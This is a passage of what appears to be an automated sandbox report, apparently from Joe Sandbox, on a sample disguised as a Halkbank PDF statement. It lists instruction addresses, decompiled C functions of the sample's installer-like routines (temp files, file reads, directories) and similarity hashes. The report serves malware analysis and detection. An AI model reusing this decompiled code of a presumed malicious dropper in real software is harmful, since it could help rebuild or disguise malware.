                                          0x00406e3f
                                          0x00406e42
                                          0x00406e45
                                          0x00406e46
                                          0x00406e49
                                          0x00406e4b
                                          0x00406e51
                                          0x00406e54
                                          0x00406e57
                                          0x00406e5a
                                          0x00406e5d
                                          0x00406e60
                                          0x00406e63
                                          0x00406e7f
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8f
                                          0x00406e93
                                          0x00406e95
                                          0x00406e99
                                          0x00406e65
                                          0x00406e65
                                          0x00406e69
                                          0x00406e71
                                          0x00406e76
                                          0x00406e78
                                          0x00406e7a
                                          0x00406e7a
                                          0x00406e9c
                                          0x00406ea3
                                          0x00406ea6
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406eb5
                                          0x00407575
                                          0x00000000
                                          0x00407575
                                          0x00406ebb
                                          0x00406ebe
                                          0x00406ec1
                                          0x00406ec5
                                          0x00406ec8
                                          0x00406ece
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed3
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406edc
                                          0x00000000
                                          0x00000000
                                          0x00406ede
                                          0x00406ee1
                                          0x00406ee4
                                          0x00406ee7
                                          0x00406eea
                                          0x00406eed
                                          0x00406ef0
                                          0x00406ef3
                                          0x00406ef6
                                          0x00406ef9
                                          0x00406efc
                                          0x00406f14
                                          0x00406f17
                                          0x00406f1a
                                          0x00406f1d
                                          0x00406f1d
                                          0x00406f20
                                          0x00406f24
                                          0x00406f26
                                          0x00406efe
                                          0x00406efe
                                          0x00406f06
                                          0x00406f0b
                                          0x00406f0d
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f29
                                          0x00406f30
                                          0x00406f33
                                          0x00000000
                                          0x00406f35
                                          0x00000000
                                          0x00406f35
                                          0x00406f33
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00000000
                                          0x00000000
                                          0x00406f75
                                          0x00406f75
                                          0x00406f79
                                          0x00407581
                                          0x00000000
                                          0x00407581
                                          0x00406f7f
                                          0x00406f82
                                          0x00406f85
                                          0x00406f89
                                          0x00406f8c
                                          0x00406f92
                                          0x00406f94
                                          0x00406f94
                                          0x00406f94
                                          0x00406f97
                                          0x00406f9a
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406f3e
                                          0x00406f3e
                                          0x00406f41
                                          0x00000000
                                          0x00406f41
                                          0x00406fa2
                                          0x00406fa2
                                          0x00406fa5
                                          0x00406fa8
                                          0x00406fab
                                          0x00406fae
                                          0x00406fb1
                                          0x00406fb4
                                          0x00406fb7
                                          0x00406fba
                                          0x00406fbd
                                          0x00406fc0
                                          0x00406fd8
                                          0x00406fdb
                                          0x00406fde
                                          0x00406fe1
                                          0x00406fe1
                                          0x00406fe4
                                          0x00406fe8
                                          0x00406fea
                                          0x00406fc2
                                          0x00406fc2
                                          0x00406fca
                                          0x00406fcf
                                          0x00406fd1
                                          0x00406fd3
                                          0x00406fd3
                                          0x00406fed
                                          0x00406ff4
                                          0x00406ff7
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00407286
                                          0x00407286
                                          0x0040728a
                                          0x004075b1
                                          0x00000000
                                          0x004075b1
                                          0x00407290
                                          0x00407293
                                          0x00407296
                                          0x0040729a
                                          0x0040729d
                                          0x004072a3
                                          0x004072a5
                                          0x004072a5
                                          0x004072a5
                                          0x004072a8
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x00000000
                                          0x00000000
                                          0x00407395
                                          0x00407399
                                          0x004073bb
                                          0x004073be
                                          0x004073c8
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x0040739b
                                          0x0040739e
                                          0x004073a2
                                          0x004073a5
                                          0x004073a5
                                          0x004073a8
                                          0x00000000
                                          0x00000000
                                          0x00407452
                                          0x00407456
                                          0x00407474
                                          0x00407474
                                          0x00407474
                                          0x0040747b
                                          0x00407482
                                          0x00407489
                                          0x00407489
                                          0x00000000
                                          0x00407489
                                          0x00407458
                                          0x0040745b
                                          0x0040745e
                                          0x00407461
                                          0x00407468
                                          0x004073ac
                                          0x004073ac
                                          0x004073af
                                          0x00000000
                                          0x00000000
                                          0x00407543
                                          0x00407546
                                          0x00000000
                                          0x00000000
                                          0x0040717d
                                          0x0040717f
                                          0x00407186
                                          0x00407187
                                          0x00407189
                                          0x0040718c
                                          0x00000000
                                          0x00000000
                                          0x00407194
                                          0x00407197
                                          0x0040719a
                                          0x0040719c
                                          0x0040719e
                                          0x0040719e
                                          0x0040719f
                                          0x004071a2
                                          0x004071a9
                                          0x004071ac
                                          0x004071ba
                                          0x00000000
                                          0x00000000
                                          0x00407490
                                          0x00407490
                                          0x00407493
                                          0x0040749a
                                          0x00000000
                                          0x00000000
                                          0x0040749f
                                          0x0040749f
                                          0x004074a3
                                          0x004075db
                                          0x00000000
                                          0x004075db
                                          0x004074a9
                                          0x004074ac
                                          0x004074af
                                          0x004074b3
                                          0x004074b6
                                          0x004074bc
                                          0x004074be
                                          0x004074be
                                          0x004074be
                                          0x004074c1
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c7
                                          0x004074c7
                                          0x004074cb
                                          0x0040752b
                                          0x0040752e
                                          0x00407533
                                          0x00407534
                                          0x00407536
                                          0x00407538
                                          0x0040753b
                                          0x00407447
                                          0x00407447
                                          0x00000000
                                          0x00407447
                                          0x004074cd
                                          0x004074d3
                                          0x004074d6
                                          0x004074d9
                                          0x004074dc
                                          0x004074df
                                          0x004074e2
                                          0x004074e5
                                          0x004074e8
                                          0x004074eb
                                          0x004074ee
                                          0x00407507
                                          0x0040750a
                                          0x0040750d
                                          0x00407510
                                          0x00407514
                                          0x00407516
                                          0x00407516
                                          0x00407517
                                          0x0040751a
                                          0x004074f0
                                          0x004074f0
                                          0x004074f8
                                          0x004074fd
                                          0x004074ff
                                          0x00407502
                                          0x00407502
                                          0x0040751d
                                          0x00407524
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x004071c2
                                          0x004071c5
                                          0x004071fb
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732e
                                          0x0040732e
                                          0x00407331
                                          0x00407333
                                          0x004075bd
                                          0x00000000
                                          0x004075bd
                                          0x00407339
                                          0x0040733c
                                          0x00000000
                                          0x00000000
                                          0x00407342
                                          0x00407346
                                          0x00407349
                                          0x00407349
                                          0x00407349
                                          0x00000000
                                          0x00407349
                                          0x004071c7
                                          0x004071c9
                                          0x004071cb
                                          0x004071cd
                                          0x004071d0
                                          0x004071d1
                                          0x004071d3
                                          0x004071d5
                                          0x004071d8
                                          0x004071db
                                          0x004071f1
                                          0x004071f6
                                          0x0040722e
                                          0x0040722e
                                          0x00407232
                                          0x0040725e
                                          0x00407260
                                          0x00407267
                                          0x0040726a
                                          0x0040726d
                                          0x0040726d
                                          0x00407272
                                          0x00407272
                                          0x00407274
                                          0x00407277
                                          0x0040727e
                                          0x00407281
                                          0x004072ae
                                          0x004072ae
                                          0x004072b1
                                          0x004072b4
                                          0x00407328
                                          0x00407328
                                          0x00407328
                                          0x00000000
                                          0x00407328
                                          0x004072b6
                                          0x004072bc
                                          0x004072bf
                                          0x004072c2
                                          0x004072c5
                                          0x004072c8
                                          0x004072cb
                                          0x004072ce
                                          0x004072d1
                                          0x004072d4
                                          0x004072d7
                                          0x004072f0
                                          0x004072f2
                                          0x004072f5
                                          0x004072f6
                                          0x004072f9
                                          0x004072fb
                                          0x004072fe
                                          0x00407300
                                          0x00407302
                                          0x00407305
                                          0x00407307
                                          0x0040730a
                                          0x0040730e
                                          0x00407310
                                          0x00407310
                                          0x00407311
                                          0x00407314
                                          0x00407317
                                          0x004072d9
                                          0x004072d9
                                          0x004072e1
                                          0x004072e6
                                          0x004072e8
                                          0x004072eb
                                          0x004072eb
                                          0x0040731a
                                          0x00407321
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x00000000
                                          0x00407323
                                          0x00000000
                                          0x00407323
                                          0x00407321
                                          0x00407234
                                          0x00407237
                                          0x00407239
                                          0x0040723c
                                          0x0040723f
                                          0x00407242
                                          0x00407244
                                          0x00407247
                                          0x0040724a
                                          0x0040724a
                                          0x0040724d
                                          0x0040724d
                                          0x00407250
                                          0x00407257
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x00000000
                                          0x00407259
                                          0x00000000
                                          0x00407259
                                          0x00407257
                                          0x004071dd
                                          0x004071e0
                                          0x004071e2
                                          0x004071e5
                                          0x00000000
                                          0x00000000
                                          0x00406f44
                                          0x00406f44
                                          0x00406f48
                                          0x0040758d
                                          0x00000000
                                          0x0040758d
                                          0x00406f4e
                                          0x00406f51
                                          0x00406f54
                                          0x00406f57
                                          0x00406f5a
                                          0x00406f5d
                                          0x00406f60
                                          0x00406f62
                                          0x00406f65
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6d
                                          0x00406f6d
                                          0x00406f6d
                                          0x00000000
                                          0x00000000
                                          0x004070cf
                                          0x004070cf
                                          0x004070d3
                                          0x00407599
                                          0x00000000
                                          0x00407599
                                          0x004070d9
                                          0x004070dc
                                          0x004070df
                                          0x004070e2
                                          0x004070e4
                                          0x004070e4
                                          0x004070e4
                                          0x004070e7
                                          0x004070ea
                                          0x004070ed
                                          0x004070f0
                                          0x004070f3
                                          0x004070f6
                                          0x004070f7
                                          0x004070f9
                                          0x004070f9
                                          0x004070f9
                                          0x004070fc
                                          0x004070ff
                                          0x00407102
                                          0x00407105
                                          0x00407105
                                          0x00407105
                                          0x00407108
                                          0x0040710a
                                          0x0040710a
                                          0x00000000
                                          0x00000000
                                          0x0040734c
                                          0x0040734c
                                          0x0040734c
                                          0x00407350
                                          0x00000000
                                          0x00000000
                                          0x00407356
                                          0x00407359
                                          0x0040735c
                                          0x0040735f
                                          0x00407361
                                          0x00407361
                                          0x00407361
                                          0x00407364
                                          0x00407367
                                          0x0040736a
                                          0x0040736d
                                          0x00407370
                                          0x00407373
                                          0x00407374
                                          0x00407376
                                          0x00407376
                                          0x00407376
                                          0x00407379
                                          0x0040737c
                                          0x0040737f
                                          0x00407382
                                          0x00407385
                                          0x00407389
                                          0x0040738b
                                          0x0040738e
                                          0x00000000
                                          0x00407390
                                          0x0040710d
                                          0x0040710d
                                          0x00000000
                                          0x0040710d
                                          0x0040738e
                                          0x004075c3
                                          0x004075e5
                                          0x004075eb
                                          0x004075ed
                                          0x004075f4
                                          0x00000000
                                          0x00000000
                                          0x00406bf2
                                          0x004075fa
                                          0x004075fa
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: esent
                                          • API String ID: 0-208730773
                                          • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                          • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                          • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                          • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 615 406187-406193 616 406194-4061c8 GetTickCount GetTempFileNameW 615->616 617 4061d7-4061d9 616->617 618 4061ca-4061cc 616->618 620 4061d1-4061d4 617->620 618->616 619 4061ce 618->619 619->620
                                          C-Code - Quality: 100%
                                          			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                          0x0040618d
                                          0x00406193
                                          0x00406194
                                          0x00406194
                                          0x00406199
                                          0x0040619a
                                          0x0040619d
                                          0x004061a2
                                          0x004061a5
                                          0x004061af
                                          0x004061bc
                                          0x004061c0
                                          0x004061c8
                                          0x00000000
                                          0x00000000
                                          0x004061cc
                                          0x00000000
                                          0x004061ce
                                          0x004061ce
                                          0x004061ce
                                          0x004061d1
                                          0x004061d4
                                          0x004061d4
                                          0x004061d7
                                          0x00000000

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004061A5
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-1968954121
                                          • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                          • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                          • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                          • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 621 403c25-403c34 622 403c40-403c48 621->622 623 403c36-403c39 CloseHandle 621->623 624 403c54-403c60 call 403c82 call 405d74 622->624 625 403c4a-403c4d CloseHandle 622->625 623->622 629 403c65-403c66 624->629 625->624
                                          C-Code - Quality: 100%
                                          			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nsc9364.tmp\\", 7); // executed
				return _t4;
			}







                                          0x00403c25
                                          0x00403c34
                                          0x00403c37
                                          0x00403c39
                                          0x00403c39
                                          0x00403c40
                                          0x00403c48
                                          0x00403c4b
                                          0x00403c4d
                                          0x00403c4d
                                          0x00403c4d
                                          0x00403c54
                                          0x00403c60
                                          0x00403c66

                                          APIs
                                          • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                          • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\nsc9364.tmp\, xrefs: 00403C5B
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsc9364.tmp\
                                          • API String ID: 2962429428-3458798565
                                          • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                          • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                          • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                          • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403371 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 713 403371-40337e 714 403380-403396 SetFilePointer 713->714 715 40339c-4033a5 call 403479 713->715 714->715 718 403473-403476 715->718 719 4033ab-4033be call 4061db 715->719 722 403463 719->722 723 4033c4-4033d7 call 403479 719->723 725 403465-403466 722->725 727 403471 723->727 728 4033dd-4033e0 723->728 725->718 727->718 729 4033e2-4033e5 728->729 730 40343f-403445 728->730 729->727 733 4033eb 729->733 731 403447 730->731 732 40344a-403461 ReadFile 730->732 731->732 732->722 734 403468-40346b 732->734 735 4033f0-4033fa 733->735 734->727 736 403401-403413 call 4061db 735->736 737 4033fc 735->737 736->722 740 403415-40341c call 40620a 736->740 737->736 742 403421-403423 740->742 743 403425-403437 742->743 744 40343b-40343d 742->744 743->735 745 403439 743->745 744->725 745->727
                                          C-Code - Quality: 92%
                                          			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                          0x00403375
                                          0x0040337e
                                          0x00403387
                                          0x0040338b
                                          0x00403396
                                          0x00403396
                                          0x0040339e
                                          0x004033a5
                                          0x004033b7
                                          0x004033be
                                          0x00403463
                                          0x00403463
                                          0x00000000
                                          0x004033c4
                                          0x004033c7
                                          0x004033d3
                                          0x004033d7
                                          0x00403471
                                          0x00403471
                                          0x004033dd
                                          0x004033e0
                                          0x0040343f
                                          0x00403445
                                          0x00403447
                                          0x00403447
                                          0x00403459
                                          0x00403461
                                          0x00403468
                                          0x0040346b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004033e2
                                          0x004033e5
                                          0x00000000
                                          0x004033eb
                                          0x004033f0
                                          0x004033f7
                                          0x004033fa
                                          0x004033fc
                                          0x004033fc
                                          0x00403409
                                          0x0040340c
                                          0x00403413
                                          0x00000000
                                          0x00000000
                                          0x0040341c
                                          0x00403423
                                          0x0040343b
                                          0x00403465
                                          0x00403465
                                          0x00403425
                                          0x00403425
                                          0x00403428
                                          0x0040342b
                                          0x00403431
                                          0x00403437
                                          0x00000000
                                          0x00403439
                                          0x00000000
                                          0x00403439
                                          0x00403437
                                          0x00000000
                                          0x00403423
                                          0x00000000
                                          0x004033f0
                                          0x004033e5
                                          0x004033e0
                                          0x004033d7
                                          0x004033be
                                          0x00403473
                                          0x00403476

                                          APIs
                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID: esent
                                          • API String ID: 973152223-208730773
                                          • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                          • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                          • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                          • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 746 4015c1-4015d5 call 402da6 call 405fe2 751 401631-401634 746->751 752 4015d7-4015ea call 405f64 746->752 753 401663-4022f6 call 401423 751->753 754 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 751->754 759 401604-401607 call 405c16 752->759 760 4015ec-4015ef 752->760 770 402c2a-402c39 753->770 771 40292e-402935 753->771 754->770 773 40165b-40165e 754->773 769 40160c-40160e 759->769 760->759 763 4015f1-4015f8 call 405c33 760->763 763->759 777 4015fa-4015fd call 405b99 763->777 775 401610-401615 769->775 776 401627-40162f 769->776 771->770 773->770 779 401624 775->779 780 401617-401622 GetFileAttributesW 775->780 776->751 776->752 782 401602 777->782 779->776 780->776 780->779 782->769
                                          C-Code - Quality: 86%
                                          			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                          0x004015c1
                                          0x004015c9
                                          0x004015cc
                                          0x004015d1
                                          0x004015d5
                                          0x004015d7
                                          0x004015df
                                          0x004015e1
                                          0x004015e4
                                          0x004015ea
                                          0x00401604
                                          0x00401607
                                          0x004015ec
                                          0x004015ec
                                          0x004015ef
                                          0x00000000
                                          0x004015fa
                                          0x004015fd
                                          0x004015fd
                                          0x004015ef
                                          0x0040160e
                                          0x00401615
                                          0x00401624
                                          0x00401624
                                          0x00401617
                                          0x0040161a
                                          0x00401622
                                          0x00000000
                                          0x00000000
                                          0x00401622
                                          0x00401615
                                          0x00401627
